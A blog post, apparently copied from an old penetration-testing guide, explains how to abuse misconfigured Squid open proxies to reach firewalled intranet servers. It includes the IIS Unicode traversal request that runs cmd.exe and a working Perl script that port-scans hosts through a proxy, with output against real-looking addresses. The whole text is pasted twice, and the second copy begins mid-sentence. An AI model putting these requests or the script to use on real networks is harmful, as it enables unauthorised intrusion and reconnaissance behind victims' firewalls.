A proxy is used to relay HTTP and HTTPs connection - if you don't know what
a proxy is you should not be reading any of this. If we find a proxy port
open on a host it excites us because it could be used to access other
web servers that are located behind a firewall if not configured correctly.
Just in the same way that your proxy server allows you to connect to it and
surf sites that are located on the outside of your server, a victim's proxy
server could serve as a gateway to reach machines that are normally not
accessible. As example - a firewall is protecting the 196.xxx.201.0/24
network. The intranet server is located on 196.xxx.201.10, but the firewall
prohibits communication to port 80 (or 443). Port 3128 on 196.xxx.201.5 is
open, and the Squid proxy is not set up correctly (it allows anyone to
connect to it). Change your proxy properties in your local browser to point
to 196.xxx.201.5 and hit 196.xxx.201.10 and access the intranet server.
You can even run an exploit over a proxy. The only difference in reaching
the machine direct and via a proxy is that the full URL needs to be send,
e.g.:
Without proxy (for example Unicode exploit):
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
With proxy:
GET http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
You will need to make some changes to your exploit's code, but generally it
wouldn't need to be difficult. Remember to point your exploit to the proxy
address and port!
You could even use a proxy as a very primitive portscanner. By requesting a
URL on a different port - say GET http://victim:port/ HTTP/1.0 you might get
a different response. Some proxies - such as Squid- does not even try to
pass traffic with a destination port lower then 1024 (other than 70,80, and
443). Traffic directed to ports higher than 1024 is allowed - by
interpreting responses from the proxy we can find out if the port is open or
closed. Hereby a simple PERL script that works OK with Squid:
---proxyscan.pl---
#!/usr/bin/perl
use Socket;
if ($#ARGV<0) {die "Usage: proxyscan.pl proxyIP:port:scanIP:beginrange:endrange
($host,$port,$scanIP,$br,$er)=split(/:/,@ARGV[0]);
print "Testing $scanIP via $host:$port:\n";
$target = inet_aton($host);
for ($mp=$br; $mp <= $er; $mp++) {
my @results=sendraw("GET http://$scanIP:$mp/ HTTP/1.0\r\n\r\n");
#system "sleep 2";
foreach $line (@results){
if ($line =~ /refused/) {print "Port $mp on $scanIP is closed\n"}
if ($line =~ /Zero/) {print "Port $mp on $scanIP is open\n"}
}
}
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
# Spidermark: sensepostdata
> perl proxyscan.pl 160.124.19.103:3128:160.124.19.98:5999:6002
Testing 160.124.19.98 via 160.124.19.103:3128:
Port 5999 on 160.124.19.98 is closed
Port 6000 on 160.124.19.98 is open
Port 6001 on 160.124.19.98 is closed
Port 6002 on 160.124.19.98 is closed
It might be that you want to change some things in this code - I have seen
that when the server does not close the connection (the port is open and
there is something listening on the other side, but no data is send) the
script hangs around for a real long time. This is due to Squidnot closing
the connection after a while, and I don't see a quick workaround for it (and
I am way too lazy for investigate it). It does work fine...provided you have
some time to kill. See also the section on network level attacks for >1024
destination port tricks.
Apparently proxy servers can also be used to send email anonymously but I
can't get any good examples of this.
a proxy is you should not be reading any of this. If we find a proxy port
open on a host it excites us because it could be used to access other
web servers that are located behind a firewall if not configured correctly.
Just in the same way that your proxy server allows you to connect to it and
surf sites that are located on the outside of your server, a victim's proxy
server could serve as a gateway to reach machines that are normally not
accessible. As example - a firewall is protecting the 196.xxx.201.0/24
network. The intranet server is located on 196.xxx.201.10, but the firewall
prohibits communication to port 80 (or 443). Port 3128 on 196.xxx.201.5 is
open, and the Squid proxy is not set up correctly (it allows anyone to
connect to it). Change your proxy properties in your local browser to point
to 196.xxx.201.5 and hit 196.xxx.201.10 and access the intranet server.
You can even run an exploit over a proxy. The only difference in reaching
the machine direct and via a proxy is that the full URL needs to be send,
e.g.:
Without proxy (for example Unicode exploit):
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
With proxy:
GET http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
You will need to make some changes to your exploit's code, but generally it
wouldn't need to be difficult. Remember to point your exploit to the proxy
address and port!
You could even use a proxy as a very primitive portscanner. By requesting a
URL on a different port - say GET http://victim:port/ HTTP/1.0 you might get
a different response. Some proxies - such as Squid- does not even try to
pass traffic with a destination port lower then 1024 (other than 70,80, and
443). Traffic directed to ports higher than 1024 is allowed - by
interpreting responses from the proxy we can find out if the port is open or
closed. Hereby a simple PERL script that works OK with Squid:
---proxyscan.pl---
#!/usr/bin/perl
use Socket;
if ($#ARGV<0) {die "Usage: proxyscan.pl proxyIP:port:scanIP:beginrange:endrange
($host,$port,$scanIP,$br,$er)=split(/:/,@ARGV[0]);
print "Testing $scanIP via $host:$port:\n";
$target = inet_aton($host);
for ($mp=$br; $mp <= $er; $mp++) {
my @results=sendraw("GET http://$scanIP:$mp/ HTTP/1.0\r\n\r\n");
#system "sleep 2";
foreach $line (@results){
if ($line =~ /refused/) {print "Port $mp on $scanIP is closed\n"}
if ($line =~ /Zero/) {print "Port $mp on $scanIP is open\n"}
}
}
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
# Spidermark: sensepostdata
> perl proxyscan.pl 160.124.19.103:3128:160.124.19.98:5999:6002
Testing 160.124.19.98 via 160.124.19.103:3128:
Port 5999 on 160.124.19.98 is closed
Port 6000 on 160.124.19.98 is open
Port 6001 on 160.124.19.98 is closed
Port 6002 on 160.124.19.98 is closed
It might be that you want to change some things in this code - I have seen
that when the server does not close the connection (the port is open and
there is something listening on the other side, but no data is send) the
script hangs around for a real long time. This is due to Squidnot closing
the connection after a while, and I don't see a quick workaround for it (and
I am way too lazy for investigate it). It does work fine...provided you have
some time to kill. See also the section on network level attacks for >1024
destination port tricks.
Apparently proxy servers can also be used to send email anonymously but I
can't get any good examples of this.
No comments:
Post a Comment